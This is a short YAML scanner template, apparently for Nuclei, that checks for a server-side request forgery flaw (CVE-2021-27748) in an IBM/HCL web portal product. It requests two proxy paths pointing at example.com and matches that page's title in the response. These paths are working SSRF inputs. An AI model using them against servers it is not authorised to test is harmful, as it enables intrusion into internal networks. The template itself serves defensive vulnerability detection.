id: yaml-poc-ibm-websphere_application_server-ssrf-CVE-2021-27748
info:
  name: Yaml Poc Ibm Websphere_Application_Server Ssrf Cve 2021 27748
  author: converted
  severity: high
  description: 'Converted from xpoc: yaml-poc-ibm-websphere_application_server-ssrf-CVE-2021-27748'
  tags: ssrf,cve
  classification:
    cve-id: CVE-2021-27748
  reference:
  - https://support.hcltechsw.com/csm?id=kb_article&sysparm_article=KB0095665
http:
- method: GET
  path:
  - /docpicker/internal_proxy/http/example.com
  matchers-condition: and
  matchers:
  - type: status
    status:
    - 200
  - type: word
    part: body
    words:
    - <title>Example Domain</title>
    - <h1>Example Domain</h1>
- method: GET
  path:
  - /wps/PA_WCM_Authoring_UI/proxy/http/example.com
  matchers-condition: and
  matchers:
  - type: status
    status:
    - 200
  - type: word
    part: body
    words:
    - <title>Example Domain</title>
    - <h1>Example Domain</h1>
